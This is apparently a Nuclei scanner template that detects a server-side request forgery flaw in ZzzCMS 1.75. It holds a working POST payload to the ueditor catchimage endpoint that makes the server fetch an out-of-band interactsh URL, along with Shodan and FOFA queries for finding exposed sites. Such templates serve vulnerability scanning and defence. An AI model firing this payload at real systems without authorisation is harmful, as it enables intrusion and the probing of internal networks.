id: zzzcms-ssrf info: name: ZzzCMS 1.75 - Server-Side Request Forgery author: ritikchaddha severity: high description: ZzzCMS (A Lightweight ASP.NET content management system) is vulnerable to SSRF(Server-Side Request Forgery). reference: - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html metadata: verified: true max-request: 1 shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" tags: zzzcms,ssrf,oast variables: filename: "{{to_lower(rand_text_alpha(4))}}" http: - raw: - | POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded source[0]=http://{{interactsh-url}}/{{filename}}.txt matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: body words: - '{"state":' - 'list":' condition: and - type: status status: - 200 # digest: 490a004630440220339262dc59b62cb3b19303288bfc967cdda661cd394c67e7bb57ba997007cc9f022006e52d3e51f444f1c203c2d37c8ef2338c87e559a1a995e15d484b232de7935a:922c64590222798bb761d5b6d8e72950